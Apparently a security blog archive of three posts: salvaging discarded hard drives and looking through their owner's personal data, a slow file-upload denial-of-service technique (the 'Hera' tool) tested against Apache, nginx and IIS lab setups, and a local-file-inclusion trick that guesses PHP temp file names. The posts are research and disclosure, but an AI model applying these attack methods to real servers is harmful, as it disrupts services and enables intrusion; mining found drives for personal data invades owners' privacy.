Category Archives: Security

Don’t litter

I’ve always hate when people throw their thrash around. My opinion about someone can go from “respectable citizen that I look up to” to “Obvious douche-bag that doesn’t respect anyone but him/herself” if I see them throw stuff on the ground. I often see people do it, and I try to lecture them whenever I catch them in the act. My hopes are of course that they will feel at least some bit of shame and maybe change their behaviour in the future.

Anyway, so near our apartment there’s this recycling station. A few containers where you can throw paper, plastic, metal and glass. The usual. Once a week there’s this pile of crap that keeps showing up. It almost always follows the same pattern and always ends up at the same spot, which makes me think that it might be the same person doing it. The trash in the pile is usually empty boxes from some fast food place (kebab and then some text in Arabic or something) and then usually a few electronics.

It always irritates me to the point where I would like to catch them in the act. But I never do. Well, until now. Or I didn’t really catch them in the act. It was more about what they dumped this time. On Wednesday this week, in the morning when I was leaving some plastic in the container, I noticed something in the “illegally placed trash pile”. Two computers (My time to shine)! I checked if there were any hard drives in them, and there were. So I decided that if the machines were still there when I came back after work, I would go there with a screwdriver and take out the drives. I was a bit worried since it was the day when they usually empty the containers, so the risk was that they would just bring the computers with them when they emptied everything else.

When I came back after work, the containers were empty but the computers were still there on the ground. So I went home, took a screwdriver and went back. It was a strange case that had a locking mechanism for the hard drives which was not easy to get off. Also, during the time I was sitting there in the dark with my screwdriver and flashlight, someone came to empty their recyclables. I quickly stood up and hid my stuff under a plastic bag, then proceeded to empty some plastic I had brought with me, in the container (to seem less suspicious. It’s all about the looks!). When the person had left I continue with my secret mission, and managed to take out all three drives.

I plugged them into my dock at home and took a quick look at the first drive. Unformated as expected with Windows Vista installed (bleh). I created a virtual drive for VirtualBox so that I could try to start the operating system on it.

VBoxManage internalcommands createrawvmdk -filename “henrietta.vmdk” -rawdisk /dev/sdg

However, the operating system was damaged and the repair process didn’t seem to work. It might have been a driver issue since it tried to load some ATI drivers before it crashed every time. I wasn’t too interested in spending a large amount of time on this, so I proceeded to just look at the data on the drive from my Linux machine. It appears to have been owned by a Ukranian lady (both machines seems to have been owned by her). They could of course have been stolen from her, so shouldn’t be too quick to blame. But i rule that out as the browser history and the programs installed all followed a consistent pattern, and all accounts saved in the browser (chrome) were using the same email and password. For the sake of our lady of the day (Henrietta), I will not disclose any detailed personal info.

The first hard drive with Windows Vista contained everything I would need to hijack the targets Internet life.

  • Browser history
  • Cookies
  • Email address (henr*************
  • Account names
  • Passwords
  • Personal files (A lot of text documents)
  • Images (hundreds)
  • Videos
  • Music

And loads of other sensitive data. I took a look at the data and then I threw everything away. No accounts were ever tested or anything unethical like that. One could argue that just taking theses drives were unethical, but if you throw something on the ground with the intention of dumping it where it’s not supposed to be, you sort of resign your ownership of it. Still there is the possibility of it being stolen. None of the operating systems worked on the machines, and the hardware was very old and some of the cards were even visibly broken. So I doubt it was stolen and then dumped there. Why would a thief go to the trouble of dumping it at “almost” the right location.

The second harddrive followed the same pattern but had Windows XP installed on it. The same user and the same type of websites had been visited. It also had a data partition with hundreds of family photos, photos of the suspected owner, and all sorts of sensitive personal data.

The third drive was completely dead and I didn’t put any more time into it.

All drives will be given to a friend who will physically destroy them (take them apart and render them useless).

Anyway, if you’re a complete ass who can’t take responsibility for your crap and just throw everything around you as you please, at least don’t throw crap that could potentially be traced back to you. Or, maybe continue, so that it’s easier to catch you. Right, Henrietta?

Denial of service – Evil is an art form


This article was originally planned to be a part of a larger project where a presentation at the developer conference Öredev was the second part. However, the presentation at Öredev got cancelled (I have stage fright so I don’t mind really). I have decided to put more energy into the writing part of this little project, do more tests and try to present some more interesting results.

The idea started with “People are so creative at messing up servers these days. I wanna do that”. And it ended in just that. People involved in some projects affected by this method have stated that they are either not vulnerable or that this attack is not dangerous and should not be considered a vulnerability. Some of these statements will be covered further down in the text. The first idea was born several years ago when I wrote a script called “Tsunami”, that simply bombs a server with file uploads. Not very efficient and I later abandoned the project as I could not get any interesting results out of it. The project was brought back to life not too long ago, and the very simple Tsunami script served as a base for the new Hera tool that will be described below.


By uploading a large amount of files to different server setups, and not finishing the upload (utilizing slow attack methods), one can get one or several of the following effects:

  • Make server unresponsive or respond with an internal server error message
  • Fill disk space resulting in different effects depending on server setup
  • Use up RAM and crash whole server

Basically it depends on the huge amount of temporary files being saved on the disk, the massive amount of file handlers being opened or if the data is stored in RAM instead of the disk. How the different results above are reached depends heavily on what type of server is used and how it is set up. The following setups were tested and will be covered in this article.

  • Windows Server with Apache
  • Windows Server with IIS 7
  • Linux server with Apache
  • Linux server with Nginx

It should be noted that some of theses effects are similar or identical to that of other attacks such as Slowloris or Slowpost. The difference is that some servers will handle file uploads differently and sometimes rather badly. This of course has different effects depending on the setup.

So here’s the thing

The original Tsunami script simply flooded a server with file uploads. The end result on a very low end machine was that the space ran out on the machine, eventually. But it was so extremely inefficient that it was not worth continuing the project. So this time I needed to figure out a way to keep the server from removing the files. For my initial testing when developing the tool I used an Apache with mod_php in Linux. Most settings were default apart from a few modifications to make the server allow more requests and in some cases be more stable, which you will see later on in this article when I list all the server results.

Now the interesting part about uploading a file to a server is that it has to store the data somewhere while the upload is being performed. Storing in RAM is usually very inefficient since it could lead to memory exhaustion very quickly (although some still do this, as you will see later in the results). Some will store the data in temporary files, which seems more reasonable. And in the case with mod_php, the data will be uploaded and stored in a temporary file before the data gets to your script/application. This was the first important thing I learned that made this slightly more exiting for me. Because this means that as long as we have access to a PHP script on a server, any script, we can upload a file and store it temporarily. Of course the file will be removed when the script has finished running, which was the case with the Tsunami script (I made a script that ran very slowly, to test this out. Didn’t get very promising results either way).

The code responsible for the upload can be found here.

The RFC in question for reference

This part is interesting, since I needed to make sure what the default settings was for file uploads. If the default was set to not allow file uploads, then this attack would be slightly less interesting.

Luckily it was set to on as default.
This means that given any standard Apache installation with mod_php enabled and at least one known PHP script reachable from the outside, this attack could be performed.


As seen here, the file is uploaded to a temporary folder (normally /tmp on Linux) with a “php” prefix.


Checking a more recent version of PHP yields the same result.
Below is the latest commit as of 2016-10-20.


So now that I have confirmed the default settings in PHP, I can start experimenting with uploading files. A simple Apache installation on a Debian machine with mod_php enabled, and a test.php under /var/www/ should be enough. The test.php could theoretically be empty and this should work either way. Uploading a file is easy enough. Create a simple form in a html file and submit it with a file selected. Nothing new there. The file will get saved in /tmp and the information about the file will be passed on to test.php when it is called. Whether test.php does something with the file is irrelevant, it will still be deleted from /tmp once the script has finished. But we want it to stay in the /tmp folder for as long as possible.

After playing around in Burp for a while, I came to think about how Slowloris keeps a connection alive by sending headers very slowly, making the server prolong the timeout period for (sometimes) as long as the client want. What if we could send a large file to the server and then not finish it, and have the server think we want to finish the upload by sending one byte at a time with very long intervals?

Sure enough, by setting a content-length header larger than the actual data we have uploaded, we can keep the file in /tmp for a long period as long as we send some data once in a while (depends on the timeout settings). The original content-length of the below request was 16881, but I set it to 168810 to make the server wait for the rest of the data.


If we check /tmp we can see that the file is indeed there


The default settings allows us to upload a total of 20 files in the same request, with a max POST size of 8MB. This makes the attack more useful as we can open 20 file descriptors now instead of just 1 as I assumed before. In this first test I didn’t send any data after the first chunk, thus the files were removed when the request timed out. But all files sent were there during the duration of the request.


Again, all files are saved as separate files in /tmp


Okay fine, so it works. Now what?

Well now that I can persist a number of files on the target system for the duration of the request (which I can prolong via a slow http attack method), I need to write a tool that can utilize this to attack the target system with. This is how the Hera tool was born (don’t put too much thought into the name, it made sense at first when a friend suggested it, but we can’t remember why).


The version above is an older one and if you want to test out the tool I recommend that you clone the repository from github (which is linked above). The newest version has support for gzip. However the gzip experiment did not produce the results I expected. Therefore support for sending gzip compressed data with the tool will be removed in the future. The tool compiles and works just fine as it is right now though. As the idea is to open a ton of connections to a target server, it is essential that you increase the amount of file descriptors that you can use in the system. This is usually set to something around 1024 or such. And the limit I have set in the example below can be anything, as long as you don’t reach the limit because then the test might fail.


This is also covered in the readme on github that I linked earlier.

Okay so how does this affect different servers?

Together with a colleague (Stefan Ivarsson), a number of tests were made and documented to test the effects this will have on different systems. The effects differs quite a bit, and if you want to make sure if this works on your own setup or not the best way would be to simply test it in a safe environment (Like a test server that is separated from your production environment).

Setup 1
Operating system: Debian (Jessie, VirtualBox)
Web server: Apache (2.4.10)
Scripting module: mod_php (PHP 5.6.19-0+deb8u1)
Max allowed files per request: 20 (Default)
Max allowed post size: 8 MB (Default)
CPU Core: 1

So basically what this meant for the test was that I could set my tool to send 20 files per request with a max size of 0.4 MB, but to give some margin for headers and such, I set it to 0.3 per file. There are two different ways that I wanted to test this attack. The first one is to send as large files as possible, which would fill up disk space and hopefully disrupt services as the machine ran out of space. The second way was to send as many small files as possible and make the server stressed by opening too many file handles. As it turns out, both methods are good for different servers and setup and will prove fatal for the server depending on certain factors (setup, ram, bandwidth, space etc).

So during the test with the above setup, I set the Hera tool to attack using 2500 threads and 2 sockets per thread. There were 20 files per request and each file was set to 0.3MB. This is 30GB worth of data being sent to the server, so if it doesn’t dispose of that information it will have to save it on either disk or in RAM, both not being enough. What happened was rather expected actually.

It should be noted that the default Apache installation allowed very few connections to be open, leading to a normal Slowloris effect. This is not what I was after and so I configured the server to allow more connections (each thread is about 1MB with this setup making it very inefficient, but don’t worry there are more test results further down). The server ran out of memory because of too many spawned Apache processes.


When the RAM was raised the space eventually ran out on the server.

As expected the number of files in the tmp folder exploded and kept the server CPU usage up during the whole time (until the disk space ran out of course in which case no more files could be created).

During the attack the Apache server was unresponsive from the outside, and when the HDD space ran out it became responsive again.

An interesting effect here was actually when I decided to halt the attack. This resulted in the CPU going up to 100% since the machine had to kill all the processes and remove all of the files. So I took this chance to immediately start the attack again to see what would happen. It would stay up at 100% CPU and continue its attempt in removing the files and processes while I was forcing it to create new ones at the same time.

Setup 2
Operating system: Windows Server 2012 (VirtualBox)
Web server: Apache (WAMP)
Scripting module: mod_php (PHP 5)
Max allowed files per request: 20 (Default)
Max allowed post size: 8 MB (Default)
CPU Core: 1

This test was conducted in a similar manner as the first one. It resulted in Apache being killed because it ate too much memory. The disk space also ran out after a while. The system became very unstable and applications got killed one after another to preserve memory (Firefox and the task manager for example). At first the same effect was reached as the connection pool ran out, but increasing the limit “fixed” that. The mpm_winnt_module was used in the first test. A more robust setup will be presented in a later test.

As you can see in the image above, the tmp files are created and persist throughout the test as expected.

The system starts killing processes when the RAM starts running out, so we are still seeing effects similar to that of a normal slowloris attack (that is, the apache processes are taking up a lot of memory for every thread started, this is nothing new).

But we are still getting our desired effect of a huge amount of files being uploaded and filling up the disk space, so that still works. After increasing the virtual machines RAM to 8GB the Apache server did not get killed during the attack. The server was mostly unresponsive during the attack and by setting the timeout of the tool to very low and the size of the files to very small, the server CPU load could be kept at around 90-100% constantly (Since it was creating and removing thousands of files all the time). At one point the Apache process stopped accepting any connections, even after the attack had stopped. Although this could not be reproduced very easily so I have yet to verify the cause of this. Another interesting effect of the attack was that the memory usage went up to 2.5-3GB and never went down again after the attack had finished (Trying to create a dump of the memory of the Apache process after the attack heavily messed up the machine so I gave up on that for now).

The picture above was taken when the process became unresponsive and stopped accepting connections. Although this cannot be seen in the picture, but instead demonstrates the memory usage several minutes after the attack had stopped.

Setup 3
Operating system: Debian (VirtualBox)
Web server: nginx
Scripting module: PHP-FPM (PHP 5)
Max allowed files per request: 20 (Default)
Max allowed post size: 1 MB (Default)
CPU Core: 1

In this test I tried the same tactic as before. One thing that I immediately noticed was that with a lot of connections and few files per request, the max allowed connections was hit pretty fast (which is not surprising).

But, with a lot of small files per request, something more interesting happened instead. It seemed to hit a max file opened limit which instead of a connection refused resulted in a 500 internal server error. Setting a small amount of files but changing the file size to larger appeared to have the same effect however. So this is probably the same effect as a slowpost attack.

Changing worker_connections in /etc/nginx/ngninx.conf to a higher value mostly fixed the issue with the first problem with opening a lot of slowloris-like connections (small amount of files only). But increasing the amount of files to the maximum (20) per request quickly downed the server again showing only an internal server error message. Changing the size of the data sent also had this effect of course.

A thing I noticed was that nginx does not hand over the data to PHP until the request has finished transmitting. This does not stop the creation of files since nginx needs to create temporary files as well. But it does stop the large amount of files being created as nginx will only create one file per request instead of a maximum of 20 like with mod_php.

Setup 4
Operating system: Windows Server 2012 (VirtualBox)
Web server: IIS 8
Scripting module: ASP.NET
CPU Core: 1

This test ended very similarly to the nginx one. The server saved the data in a single temporary file it seems and did not seem to have a lot of problems with the amount of connections to the server. In the end, when maxing the attack from the test attacking machine, the web server became unresponsive about 8/10 of the times. This was most likely more of a Slowloris/Slowpost type of effect rather than a result of a lot of files being created. More tests could be made on this setup to further investigate methods of bringing the server down, but because of the relatively bad result (compared to the other setups) I decided to leave it at that for now. The server can be stressed no doubt about that, but not in the way that I intended for this experiment.

Setup 5
Operating system: Debian (Amazon EC2, m4.xlarge)
Web server: Apache
Scripting module: PHP-FPM (PHP 7)
Max allowed files per request: 20 (Default)
Max allowed post size: 8 MB (Default)
CPU Core: 1

This test was very special and was the last very big test I wanted to make. The goal of the test was to try the attack method on a large more realistic setup in the cloud. To do this I took the help of Werner Kwiatkowski over at who (in exchanged for candy, herring and beverage) helped me to setup a realistic and stable server that could take a punch.

The first problem I had as the attacker, was that the server would only create a single temporary file per request, instead of a maximum of 20 like I was expecting. The second “problem” was that the server became unresponsive in a Slowloris/Slowpost kind of manner instead of being effected by my many uploaded files. This was because Werner had set it up in a way so that the server would rather become unresponsive than to crash catastrophically. This is of course preferred and defeated my tool in a way. So, to get my desired effect I actually had to change the max allowed connections of the server to a lot higher so that I could see the effects of all the files being created. This of course differs from my initial idea of only testing near default setups, but I felt it could be important to have some more realistic samples as well. And yes, I used for the final test.

The amount of files specified above seemed to be the max I could reach. However, after the limit was reached something very interesting happened. The server appeared to store the files that could not be written to temporary files, in memory instead. This made the RAM usage go completely out of control very quickly. It took a while for the attack to actually use up all of that RAM, but after about 30 minutes or so, it had finally managed to fill it all up.

The image above was taken about a minute before the server stopped responding and crashed because of memory exhaustion.

Logging into the AWS account and checking the EC2 instances makes it more clear that the node has crashed. Now, of course this could still mean that the effects we are seeing are still the effects of a Slowloris attack where the processes created are the ones using up all the memory. So to test that I did the same test with a Slowloris attack tool with this setup. The result was actually not that impressive even when I tried using more connections than with the Hera tool.

As you can see the memory usage for the same amount of threads/connections used is not even close. That is because this particular setup is not vulnerable to the normal Slowloris attack, nor is it vulnerable to Slowpost (I did not try Slowread and other slow attacks).

This time dumping memory was a lot easier so I could check if the data was still stored in memory even after the attack was in idle mode (As in, it was not currently transmitting a lot of data and was simply waiting for the timeout to occur). The data from the payload could be found in the process memory which explains why the RAM usage went out of control like it did. I have not investigated this any further though.

So, in summary

I would like to think that this method could be used for some pretty bad stuff. It’s not an entirely new attack method but rather a new way of performing slow attacks against servers that handles file uploads in a bad way. Not all of the setups were vulnerable to this method, but most of them were either vulnerable to this method or they were vulnerable to other slow attacks which became apparent during the test (For example slowpost on nginx setups).

This method can be used in other ways than crashing servers. It can be used in an attack to guess temporary file names when you only have a file inclusion vulnerability at your disposal. You can read the start of that project here.

When I started playing around with this method I contacted Apache, PHP and Redhat to see what they had to say about it. Apache said it does not directly affect them (which is true since in the case of mod_php that is in the hands of the PHP team). PHP said that it was not a security issue and that file uploads is not turned on by default. If you read the article you will see that this is just not true and I have asked them to clarify on what they mean about that, without getting an answer. Redhat were extremely helpful and even setup a test machine for the tool where they could see the effects. However, they did not deem this a vulnerability and closed the case. I still think it’s an interesting method and I also feel like it should be okay for me to post this now without regretting it later due to breaking any responsible disclosure policies.

Thanks for reading!

Local file inclusion with tmp files

A thing I noticed while writing the Hera tool and doing all the tests, is that some server setups did not have very good randomness in their temporary files. This opens up for some interesting opportunities if you happen to have found a local file inclusion vulnerability in an application.

Imagine the following not very good code in an application

Looks bad, and I promise this is not that unusual and we find it from time to time during our reviews.

And here are some temporary files that were created in the WAMP test that I did while writing the article for Hera. Notice that the random string after the “php” prefix is rather short and should be easy to predict or brute force.

So to test this I modified Hera a bit, or more specifically the payload builder of the tool to include a piece of PHP code at the end of every file uploaded to a server.

Notice the “ThisShouldNotExist”. If the code gets executed that text will show up on the vulnerable page. Now we need another tool to constantly test including a set of temporary files that we think will show up eventually. I wrote a simple Python script for this.

And then we run the two tools, wait a little while and see the result. Notice how small the files are, to make the process quicker. We are not interested in sending a lot of data to the server this time. Of course this could all be optimized greatly, and right now the Hera tool will uploaded the set of files like normal. A more optimal solution would be to have Hera upload a set of files, then restart the attack so that a new set of tmp files would be created on the server. Thus raising the chance of our guessed tmp files to be created.

Now, this was on Windows. And the code for creating temporary files in mod_php is different depending on the operating system. The default function for Linux is more secure but could still be used as well (although this would take a lot more time). I will build a proof-of-concept for the Linux scenario as well, and update this article when it’s finished. But for now you will have to be satisfied with these results :-).

As you can see in the image above the names are more random and also longer on Linux, making this a lot harder to guess the name of. The code below shows some Windows specific code related to the creation of the temporary file. The complete code can be found in the link below.

Linux uses the mkstemp function to create its random strings for the file names. This is pretty secure but not fool proof. As mentioned earlier I will update this article when I have fixed test data for this scenario as well. More to come.

UPDATE – 161129: I’ve tried to contact the PHP security team about this (twice) and have not received a single response. I have therefore decided to just post this now and all future results relating to this issue.